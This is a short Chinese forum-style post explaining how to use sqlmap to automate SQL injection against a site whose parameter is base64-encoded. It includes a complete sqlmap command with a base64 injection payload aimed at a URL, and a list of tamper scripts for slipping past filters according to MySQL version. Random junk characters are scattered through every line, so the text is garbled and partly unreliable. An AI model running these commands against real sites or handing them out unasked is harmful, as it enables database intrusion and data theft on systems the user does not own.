WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
6 a$ }9 s6 X# Y" b5 }/ ~* m2 J2 y9 o' n( W" F2 M+ m- K
sqlmap的tamper里有个base64encode.py$ f; c7 `. Y9 p5 L$ H' _
, j7 @1 g! F, H/ z, P) N$ W7 U5 X
使用如下
b* i- X: w- G9 L; v9 K0 N7 H+ V
: r) U* O; t9 n( i- c1 B! ^1 Lsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
; Q6 l$ \9 q* P% ?" c
- }1 Y+ n& y" _/ k$ p
1 r! |3 i4 {2 P7 X& Lsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”# k, g* c" C/ I. Q0 ?8 Z' {
2 F Q3 X* ]! p o% F其中常用到的bypass脚本绕过SQLMAP主要两个脚本:$ D m- ]* D& A2 B, K( O6 k4 E
* G5 T' W5 r! b, Z, h& e8 ?space2hash.py ,对于MYSQL数据库 4.0, 5.0注入1 `9 K% [& `* O: m+ H8 J
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
& o2 b. }; ~; b( Q" d首先确定目标数据库版本,然后选择相应的脚本。
3 D4 t: O( @: p: A1 h3 @0 V-v 3 --batch --tamper "space2hash.py"
, k; ` C* H; d3 K3 M' s% N" M* q2 `3 ~2 l% B* F
还有其他一些插件:
3 j9 ?% E* f9 G6 e; P+ L2 C* gencodes编码 ——charencode.py
% {0 h4 z- Z4 O$ y4 ubase64编码 —— base64encode.py. s! T3 o; z' i
替换空格和关键字 —— halfversionedmorekeywords.py [1 ?. e" F7 C, z4 O7 m# [: `
| $ S C$ c) }2 l( M/ W
8 i/ N- E- O5 @4 ]+ y- f# U6 O0 t+ V9 @0 c
3 w) @+ C6 M2 o. P* \ |